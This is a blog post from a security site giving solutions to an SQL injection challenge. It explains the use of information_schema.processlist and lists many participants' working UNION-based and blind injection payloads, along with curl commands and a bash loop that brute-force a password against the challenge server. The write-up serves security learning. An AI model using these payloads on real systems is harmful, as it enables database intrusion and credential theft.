Solutions for challenge 2B

Solutions for challenge 2B

Posted on August 16, 2012 by Roberto Salgado

After posting the solutions for challenge 2A from the series of SQL Injection challenges, it only made sense to continue with 2B; considering that 'B' is a slighty more difficult variation of 'A'. Challenge 2B is probably my favorite challenge because of its simplicity, yet how confusing it was for many participants.

 

Explanation

DISCLAIMER: If you haven't tried this challenge, it is still available here in case you want to give it a shot before reading the SOLUTIONS below.

This challenge, similar to 2A, allows you to log in as guest and creates the cookie user_id which is vulnerable to SQL Injection. Initially no filtering was used since the idea behind the challenge was to figure out different ways of retrieving the table/column name. What is tricky about this challenge is that it uses a temporary table to store the credentials and the temp table only exists during the PHP script's execution. The thing about temporary tables is that they do not appear in information_schema.tables/columns, so this was the perfect way of making participants figure out other methods for obtaining the table/column names.

The intended solution is to use information_schema.proccesslist, which is available starting from MySQL 5.1. Injecting union select info from information_schema.processlist will return the whole query being used which can be extremely useful when table_name/column_name are being blocked by a WAF/IDS.

Example

-1 union select info from information_schema.processlist

SELECT websec_rocks_temp_username, websec_rocks_temp_user_priv FROM websec_rocks_temp_uzuAr1Os WHERE websec_rocks_temp_user_id = -1 union select info from information_schema.processlist

Challenge Modifications

After w00d's and Miroslav's solutions, I made 2 slight adjustments to the challenge, so that it would be solved as intended. W00d's solution used PROCEDURE ANALYSE(), so I decided to block the word 'PROCEDURE', since this method is already documented on The SQL Injection KB; w00d later submitted a solution using the intended method. As for Miroslav, he was able to find the column name through a dictionary attack using the txt/common-columns.txt file from sqlmap. The second modification was to change the column names so they could no longer be guessed.

 

Solutions

NULL Life CTF TEAM:

user_id= 3 union select 1,2,concat_ws(0x3a,command,time,state,info),4 from information_schema.processlist limit 1-- -

Raz0r:

user_id=-1+union+select+1,2,INFO,4+FROM+information_schema.PROCESSLIST+LIMIT+1--+-

user_id=0+and+IF(ORD(MID(temp_password,0,1))+BETWEEN+0+AND+255,1,(select+1+union+select+2))--+-

w00d:

curl -i http://50.57.51.240/challenges/2B/challenge.php --cookie "user_id=0 limit 3,1 PROCEDURE ANALYSE()"

curl -i http://50.57.51.240/challenges/2B/challenge.php --cookie "user_id=-1 union select group_concat(info),2 from information_schema.processlist"

Miroslav Stampar:

1 OR LENGTH()>0 LIMIT 0,1

user_id=0 AND ORD(MID(temp_password,17,1))>1 LIMIT 0,1

g4mm4:

user_id=-1 union select info,'padding' from information_schema.processlist#

Dominus:

user_id=0+and+1=0+union+select+1,unhex(hex(concat_ws(0x3a,info,state)))+from information_schema.processlist limit 0,1

user_id=0 and websec_rocks_temp_password like 'a%'

mortis:

Used processlist

user_id=0 and websec_rocks_temp_password like '%'

Karion:

Used processlist

for i in {4,5,6,7} ; do for j in {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} ; do curl http://50.57.51.240/challenges/2B/challenge.php -b "user_id=-9 or websec_rocks_temp_password LIKE 0x454c5f4d55595f56455247${i}${j}25" 2>&1 | grep ADMIN ; echo $i$j ;done; done

BlackFan:

user_id=-1 union select info,2 from information_schema.processlist limit 1;

user_id=0 and (@:=websec_rocks_temp_password) union select @,1;

gijs:

user_id=5 UNION select 1,(select info from information_schema.processlist LIMIT 1)

Same script from challenge 2A.

MisterJyu:

Used processlist

if(mid(binary(websec_rocks_temp_password),1,1)='a',0,1)

Submitted a Python script found here.

Nurfed:

user_id=-1 union select 1,info from information_schema.PROCESSLIST limit 0,1#

user_id=0 and LENGTH(websec_rocks_temp_password)=16#

user_id=0 and websec_rocks_temp_password like 0x25656c5f6d75795f76657267756974617325#

 

A full list of the victors for each challenge is available here.

 


Latest Blog Entries

Panoptic
An overview of Panoptic, an open source penetration testing tool that automates the process of search and retrieval of common log and config files through LFI vulnerabilities.

Special discount code for "Nmap 6: Network Exploration and Security Auditing Cookbook"
PacktPub created a special discount code for our friends from HackerHalted

Mac2WepKey HHG5xx for iPhone
The famous app to obtain the default WiFi passwords for Huawei routers is now available for the iPhone iOS 5.

Latest News

Jun 18, 2014
Websec present at Campus Party 2014

Websec will be participating with four conferences at the largest Campus Party ever held, which will take place from the 24-29 of June in Guadalajara, Mexico.

Oct 01, 2013
Websec at DerbyCon 2013
A summary of Websec's participation at DerbyCon 2013 in Louisville, Kentucky.